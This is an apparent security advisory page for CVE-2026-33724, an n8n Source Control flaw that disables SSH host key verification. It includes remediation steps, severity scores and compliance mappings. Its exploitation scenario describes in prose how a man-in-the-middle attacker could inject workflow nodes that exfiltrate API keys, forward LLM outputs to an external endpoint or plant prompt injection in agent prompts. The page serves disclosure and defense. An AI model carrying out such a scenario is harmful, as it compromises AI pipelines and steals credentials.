CVE-2026-33724 — HIGH (CVSS 7.4)

Q: Is CVE-2026-33724 actively exploited?

No confirmed active exploitation of CVE-2026-33724 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-33724?

1) Upgrade n8n to version 2.5.0 or later—this is the only full remediation. 2) If upgrade is blocked, disable the Source Control feature entirely via settings. 3) As a network control, route n8n-to-git-server traffic exclusively over a private VPC or VPN where MitM is not feasible. 4) Audit workflow git history for unexpected commits or structural changes to HTTP, code, or LLM nodes. 5) Enable SSH known_hosts enforcement across all automation tooling and validate this is not silently disabled in other CI/CD components. 6) Review n8n logs for unexpected git sync activity or authentication anomalies.

Q: What systems are affected by CVE-2026-33724?

This vulnerability affects the following AI/ML architecture patterns: AI agent pipelines, workflow automation frameworks, n8n-based agent orchestration, CI/CD for AI systems, LLM tool-call pipelines, RAG ingestion workflows.

Q: What is the CVSS score for CVE-2026-33724?

CVE-2026-33724 has a CVSS v3.1 base score of 7.4 (HIGH). The EPSS exploitation probability is 0.02%.

CISO Take

n8n instances with Source Control configured over SSH are vulnerable to man-in-the-middle attacks that can silently inject malicious content into AI automation workflows. The patch is available in 2.5.0—upgrade immediately; if not feasible, disable Source Control or enforce trusted network paths to the git server. The critical risk here is not data theft: it is an attacker reshaping AI agent behavior at the workflow layer, invisible to end users.

What is the risk?

CVSS 7.4 (High) is appropriate but real-world risk is constrained by two factors: the Source Control SSH feature must be explicitly enabled (non-default), and the attacker must achieve network MitM positioning between n8n and the git server (AC:H). EPSS 0.00013 reflects negligible current exploitation in the wild. However, for organizations running n8n as an AI agent orchestration hub—a common pattern—the blast radius of a successful exploit is disproportionately large: a single poisoned workflow can compromise every AI pipeline routed through that instance.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
n8n	npm	< 2.5.0	`2.5.0`
187.3K OpenSSF 6.1 16 dependents Pushed 3d ago 40% patched ~3d to patch Full package profile →

Do you use n8n? You're affected.

Severity & Risk

CVSS 3.1

7.4 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 4% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Advanced

Attack Surface

AV Network

AC High

PR None

UI None

S Unchanged

C High

I High

A None

What should I do?

1 step

1) Upgrade n8n to version 2.5.0 or later—this is the only full remediation. 2) If upgrade is blocked, disable the Source Control feature entirely via settings. 3) As a network control, route n8n-to-git-server traffic exclusively over a private VPC or VPN where MitM is not feasible. 4) Audit workflow git history for unexpected commits or structural changes to HTTP, code, or LLM nodes. 5) Enable SSH known_hosts enforcement across all automation tooling and validate this is not silently disabled in other CI/CD components. 6) Review n8n logs for unexpected git sync activity or authentication anomalies.

CISA SSVC Assessment

Decision Track

Exploitation none

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Auth Bypass Agent Framework AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0081 - Modify AI Agent Configuration AML.T0099 - AI Agent Tool Data Poisoning

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 9 - Risk management system

ISO 42001

A.6.2.6 - AI system supply chain

NIST AI RMF

GOVERN 1.1 - AI risk management policies MAP 5.1 - Likelihood of AI risks

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-33724?

n8n instances with Source Control configured over SSH are vulnerable to man-in-the-middle attacks that can silently inject malicious content into AI automation workflows. The patch is available in 2.5.0—upgrade immediately; if not feasible, disable Source Control or enforce trusted network paths to the git server. The critical risk here is not data theft: it is an attacker reshaping AI agent behavior at the workflow layer, invisible to end users.

Is CVE-2026-33724 actively exploited?

No confirmed active exploitation of CVE-2026-33724 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-33724?

1) Upgrade n8n to version 2.5.0 or later—this is the only full remediation. 2) If upgrade is blocked, disable the Source Control feature entirely via settings. 3) As a network control, route n8n-to-git-server traffic exclusively over a private VPC or VPN where MitM is not feasible. 4) Audit workflow git history for unexpected commits or structural changes to HTTP, code, or LLM nodes. 5) Enable SSH known_hosts enforcement across all automation tooling and validate this is not silently disabled in other CI/CD components. 6) Review n8n logs for unexpected git sync activity or authentication anomalies.

What systems are affected by CVE-2026-33724?

This vulnerability affects the following AI/ML architecture patterns: AI agent pipelines, workflow automation frameworks, n8n-based agent orchestration, CI/CD for AI systems, LLM tool-call pipelines, RAG ingestion workflows.

What is the CVSS score for CVE-2026-33724?

CVE-2026-33724 has a CVSS v3.1 base score of 7.4 (HIGH). The EPSS exploitation probability is 0.02%.

Technical Details

NVD Description

n8n is an open source workflow automation platform. Prior to version 2.5.0, when the Source Control feature is configured to use SSH, the SSH command used for git operations explicitly disabled host key verification. A network attacker positioned between the n8n instance and the remote Git server could intercept the connection and present a fraudulent host key, potentially injecting malicious content into workflows or intercepting repository data. This issue only affects instances where the Source Control feature has been explicitly enabled and configured to use SSH (non-default). The issue has been fixed in n8n version 2.5.0. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should consider the following temporary mitigations: Disable the Source Control feature if it is not actively required, and/or restrict network access to ensure the n8n instance communicates with the Git server only over trusted, controlled network paths. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Exploitation Scenario

An attacker with network positioning on the path between the n8n instance and its remote git server—achievable via ARP poisoning on the same subnet, a compromised cloud routing layer, or BGP manipulation—intercepts the SSH handshake when n8n pulls workflow updates. Because StrictHostKeyChecking is disabled, n8n silently accepts the attacker's fraudulent host key. The attacker serves a modified repository containing production workflows with injected malicious steps: an added HTTP Request node that forwards all LLM completions to an external endpoint, a modified AI Agent node with a rewritten system prompt introducing a persistent indirect prompt injection, or a Code node that exfiltrates environment variables including API keys for downstream AI services. These poisoned workflows deploy transparently and execute on every subsequent trigger, potentially for weeks before discovery.